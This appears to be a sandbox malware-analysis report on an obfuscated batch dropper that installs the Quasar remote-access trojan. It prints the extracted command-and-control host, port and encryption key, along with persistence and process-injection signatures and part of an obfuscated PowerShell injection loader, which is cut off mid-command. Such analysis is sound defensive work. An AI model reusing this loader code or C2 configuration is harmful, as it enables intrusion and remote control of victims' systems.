Analysis
-
max time kernel
300s -
max time network
216s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
12-05-2024 18:34
Static task
static1
Behavioral task
behavioral1
Sample
Fixer-obf.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Fixer-obf.bat
Resource
win10v2004-20240226-en
General
-
Target
Fixer-obf.bat
-
Size
24KB
-
MD5
03361badff8e7ecad39acd34f5f14749
-
SHA1
c023fd9bd854f59f527141824e8fa6a311a57858
-
SHA256
3026eb3fcde09d0d4e0695b3f74cb420b1e9d64b30c1ced3ed6a20f085a34d51
-
SHA512
796e7466d4af6e2d52bc265b6a9d0881989cebd52ff6c6bae8d3817db61f50dc26e5982a6eb5fe16bf4e7d5cf3aa09a5a33e35c51c94a58d32438684fb88f979
-
SSDEEP
384:UOpRAoUR7FKSVwpehr0kqTdyUO0OPniIjSFI:zpRrURhKKEehr0kqTIUO0OPnih+
Malware Config
Extracted
quasar
3.1.5
RPad
even-lemon.gl.at.ply.gg:33587
$Sxr-okPqrmZ8kNVUcS4Rp0
-
encryption_key
XmcBnPuLlN1e8SHIRR1z
-
install_name
$sxr-powershell.exe
-
log_directory
$SXR-LOGS
-
reconnect_delay
3000
-
startup_key
$sxr-powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\BoostBot.exe family_quasar behavioral3/memory/2332-26-0x0000000000DE0000-0x0000000000E4C000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 3456 created 636 3456 powershell.EXE winlogon.exe PID 236 created 636 236 powershell.EXE winlogon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 4 IoCs
Processes:
BoostBot.exe$sxr-powershell.exeinstall.exeinstall.exepid process 2332 BoostBot.exe 1996 $sxr-powershell.exe 2128 install.exe 1680 install.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 8 raw.githubusercontent.com 11 raw.githubusercontent.com 20 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 7 ip-api.com -
Drops file in System32 directory 9 IoCs
Processes:
powershell.EXEsvchost.exeOfficeClickToRun.exepowershell.EXEsvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\$77$sxr-powershell.exe svchost.exe File opened for modification C:\Windows\System32\Tasks\$77svc64 svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 3456 set thread context of 1844 3456 powershell.EXE dllhost.exe PID 236 set thread context of 1440 236 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeSCHTASKS.exeSCHTASKS.exepid process 1528 schtasks.exe 3992 schtasks.exe 3560 SCHTASKS.exe 4520 SCHTASKS.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEOfficeClickToRun.exepowershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={1B0F0662-E246-4328-BBA6-1600A4BDA848}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sun, 12 May 2024 18:36:28 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.EXEdllhost.exe$sxr-powershell.exewmiprvse.exepid process 1292 powershell.exe 1292 powershell.exe 3456 powershell.EXE 3456 powershell.EXE 3456 powershell.EXE 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1996 $sxr-powershell.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1996 $sxr-powershell.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 5036 wmiprvse.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1996 $sxr-powershell.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1996 $sxr-powershell.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1996 $sxr-powershell.exe 1844 dllhost.exe 1844 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeBoostBot.exe$sxr-powershell.exepowershell.EXEdllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 1292 powershell.exe Token: SeDebugPrivilege 2332 BoostBot.exe Token: SeDebugPrivilege 1996 $sxr-powershell.exe Token: SeDebugPrivilege 3456 powershell.EXE Token: SeDebugPrivilege 3456 powershell.EXE Token: SeDebugPrivilege 1844 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2664 svchost.exe Token: SeIncreaseQuotaPrivilege 2664 svchost.exe Token: SeSecurityPrivilege 2664 svchost.exe Token: SeTakeOwnershipPrivilege 2664 svchost.exe Token: SeLoadDriverPrivilege 2664 svchost.exe Token: SeSystemtimePrivilege 2664 svchost.exe Token: SeBackupPrivilege 2664 svchost.exe Token: SeRestorePrivilege 2664 svchost.exe Token: SeShutdownPrivilege 2664 svchost.exe Token: SeSystemEnvironmentPrivilege 2664 svchost.exe Token: SeUndockPrivilege 2664 svchost.exe Token: SeManageVolumePrivilege 2664 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2664 svchost.exe Token: SeIncreaseQuotaPrivilege 2664 svchost.exe Token: SeSecurityPrivilege 2664 svchost.exe Token: SeTakeOwnershipPrivilege 2664 svchost.exe Token: SeLoadDriverPrivilege 2664 svchost.exe Token: SeSystemtimePrivilege 2664 svchost.exe Token: SeBackupPrivilege 2664 svchost.exe Token: SeRestorePrivilege 2664 svchost.exe Token: SeShutdownPrivilege 2664 svchost.exe Token: SeSystemEnvironmentPrivilege 2664 svchost.exe Token: SeUndockPrivilege 2664 svchost.exe Token: SeManageVolumePrivilege 2664 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2664 svchost.exe Token: SeIncreaseQuotaPrivilege 2664 svchost.exe Token: SeSecurityPrivilege 2664 svchost.exe Token: SeTakeOwnershipPrivilege 2664 svchost.exe Token: SeLoadDriverPrivilege 2664 svchost.exe Token: SeSystemtimePrivilege 2664 svchost.exe Token: SeBackupPrivilege 2664 svchost.exe Token: SeRestorePrivilege 2664 svchost.exe Token: SeShutdownPrivilege 2664 svchost.exe Token: SeSystemEnvironmentPrivilege 2664 svchost.exe Token: SeUndockPrivilege 2664 svchost.exe Token: SeManageVolumePrivilege 2664 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2664 svchost.exe Token: SeIncreaseQuotaPrivilege 2664 svchost.exe Token: SeSecurityPrivilege 2664 svchost.exe Token: SeTakeOwnershipPrivilege 2664 svchost.exe Token: SeLoadDriverPrivilege 2664 svchost.exe Token: SeSystemtimePrivilege 2664 svchost.exe Token: SeBackupPrivilege 2664 svchost.exe Token: SeRestorePrivilege 2664 svchost.exe Token: SeShutdownPrivilege 2664 svchost.exe Token: SeSystemEnvironmentPrivilege 2664 svchost.exe Token: SeUndockPrivilege 2664 svchost.exe Token: SeManageVolumePrivilege 2664 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2664 svchost.exe Token: SeIncreaseQuotaPrivilege 2664 svchost.exe Token: SeSecurityPrivilege 2664 svchost.exe Token: SeTakeOwnershipPrivilege 2664 svchost.exe Token: SeLoadDriverPrivilege 2664 svchost.exe Token: SeSystemtimePrivilege 2664 svchost.exe Token: SeBackupPrivilege 2664 svchost.exe Token: SeRestorePrivilege 2664 svchost.exe Token: SeShutdownPrivilege 2664 svchost.exe Token: SeSystemEnvironmentPrivilege 2664 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$sxr-powershell.exepid process 1996 $sxr-powershell.exe -
Suspicious use of UnmapMainImage 2 IoCs
Processes:
Explorer.EXERuntimeBroker.exepid process 3244 Explorer.EXE 3952 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeBoostBot.exe$sxr-powershell.exepowershell.EXEdllhost.exedescription pid process target process PID 3932 wrote to memory of 1008 3932 cmd.exe chcp.com PID 3932 wrote to memory of 1008 3932 cmd.exe chcp.com PID 3932 wrote to memory of 1908 3932 cmd.exe findstr.exe PID 3932 wrote to memory of 1908 3932 cmd.exe findstr.exe PID 3932 wrote to memory of 4888 3932 cmd.exe findstr.exe PID 3932 wrote to memory of 4888 3932 cmd.exe findstr.exe PID 3932 wrote to memory of 3336 3932 cmd.exe findstr.exe PID 3932 wrote to memory of 3336 3932 cmd.exe findstr.exe PID 3932 wrote to memory of 2240 3932 cmd.exe findstr.exe PID 3932 wrote to memory of 2240 3932 cmd.exe findstr.exe PID 3932 wrote to memory of 1428 3932 cmd.exe cmd.exe PID 3932 wrote to memory of 1428 3932 cmd.exe cmd.exe PID 3932 wrote to memory of 4620 3932 cmd.exe find.exe PID 3932 wrote to memory of 4620 3932 cmd.exe find.exe PID 3932 wrote to memory of 3104 3932 cmd.exe find.exe PID 3932 wrote to memory of 3104 3932 cmd.exe find.exe PID 3932 wrote to memory of 1380 3932 cmd.exe cmd.exe PID 3932 wrote to memory of 1380 3932 cmd.exe cmd.exe PID 3932 wrote to memory of 860 3932 cmd.exe certutil.exe PID 3932 wrote to memory of 860 3932 cmd.exe certutil.exe PID 3932 wrote to memory of 1292 3932 cmd.exe powershell.exe PID 3932 wrote to memory of 1292 3932 cmd.exe powershell.exe PID 1292 wrote to memory of 2332 1292 powershell.exe BoostBot.exe PID 1292 wrote to memory of 2332 1292 powershell.exe BoostBot.exe PID 1292 wrote to memory of 2332 1292 powershell.exe BoostBot.exe PID 3932 wrote to memory of 2956 3932 cmd.exe icacls.exe PID 3932 wrote to memory of 2956 3932 cmd.exe icacls.exe PID 3932 wrote to memory of 4132 3932 cmd.exe reg.exe PID 3932 wrote to memory of 4132 3932 cmd.exe reg.exe PID 3932 wrote to memory of 4632 3932 cmd.exe attrib.exe PID 3932 wrote to memory of 4632 3932 cmd.exe attrib.exe PID 2332 wrote to memory of 1528 2332 BoostBot.exe schtasks.exe PID 2332 wrote to memory of 1528 2332 BoostBot.exe schtasks.exe PID 2332 wrote to memory of 1528 2332 BoostBot.exe schtasks.exe PID 2332 wrote to memory of 1996 2332 BoostBot.exe $sxr-powershell.exe PID 2332 wrote to memory of 1996 2332 BoostBot.exe $sxr-powershell.exe PID 2332 wrote to memory of 1996 2332 BoostBot.exe $sxr-powershell.exe PID 1996 wrote to memory of 3992 1996 $sxr-powershell.exe schtasks.exe PID 1996 wrote to memory of 3992 1996 $sxr-powershell.exe schtasks.exe PID 1996 wrote to memory of 3992 1996 $sxr-powershell.exe schtasks.exe PID 2332 wrote to memory of 2128 2332 BoostBot.exe install.exe PID 2332 wrote to memory of 2128 2332 BoostBot.exe install.exe PID 2332 wrote to memory of 2128 2332 BoostBot.exe install.exe PID 2332 wrote to memory of 3560 2332 BoostBot.exe SCHTASKS.exe PID 2332 wrote to memory of 3560 2332 BoostBot.exe SCHTASKS.exe PID 2332 wrote to memory of 3560 2332 BoostBot.exe SCHTASKS.exe PID 3456 wrote to memory of 1844 3456 powershell.EXE dllhost.exe PID 3456 wrote to memory of 1844 3456 powershell.EXE dllhost.exe PID 3456 wrote to memory of 1844 3456 powershell.EXE dllhost.exe PID 3456 wrote to memory of 1844 3456 powershell.EXE dllhost.exe PID 3456 wrote to memory of 1844 3456 powershell.EXE dllhost.exe PID 3456 wrote to memory of 1844 3456 powershell.EXE dllhost.exe PID 3456 wrote to memory of 1844 3456 powershell.EXE dllhost.exe PID 3456 wrote to memory of 1844 3456 powershell.EXE dllhost.exe PID 1844 wrote to memory of 636 1844 dllhost.exe winlogon.exe PID 1844 wrote to memory of 692 1844 dllhost.exe lsass.exe PID 1844 wrote to memory of 996 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 400 1844 dllhost.exe dwm.exe PID 1844 wrote to memory of 612 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1048 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1156 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1164 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1176 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1184 1844 dllhost.exe svchost.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:636
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:400
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{00372330-4af8-49e0-8c27-6d510d124bdc}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{85a28419-cd9f-4561-9753-d08abe3d42d2}2⤵PID:1440
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:612
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1048
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HLjMZdySoXGI{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$sVcObxKOIUWRKN,[Parameter(Position=1)][Type]$XtyyHPKFXj)$yFvjaBgknUS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+'lec'+'t'+''+[Char](101)+'dD'+[Char](101)+'l'+[Char](101)+'g'+'a'+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+'e'+'m'+[Char](111)+'r'+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'ga'+'t'+''+[Char](101)+'T'+'y'+''+'p'+''+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+'S'+'e'+'a'+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](65)+'u'+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+'ass',[MulticastDelegate]);$yFvjaBgknUS.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+'al'+'N'+'a'+[Char](109)+''+'e'+''+','+''+[Char](72)+'i'+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$sVcObxKOIUWRKN).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+'a'+'na'+'g'+''+[Char](101)+''+[Char](100)+'');$yFvjaBgknUS.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e','P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+'yS'+'i'+''+[Char](103)+''+','+''+[Char](78)+'e'+'w'+'S'+[Char](108)+''+'o'+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$XtyyHPKFXj,$sVcObxKOIUWRKN).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'im'+'e'+',M'+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $yFvjaBgknUS.CreateType();}$ANIcTswqOqUet=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+'s'+'o'+'f'+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+'N'+'a'+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+'s'+'');$fUdwnMFTuyiIoO=$ANIcTswqOqUet.GetMethod(''+[Char](71)+'e'+[Char](116)+'P'+'r'+''+[Char](111)+''+'c'+''+'A'+''+'d'+'dr'+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+'at'+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DPpyMZsWuUiSjMxqfCA=HLjMZdySoXGI @([String])([IntPtr]);$rIuQYHuUmLYvDHANIzswMn=HLjMZdySoXGI 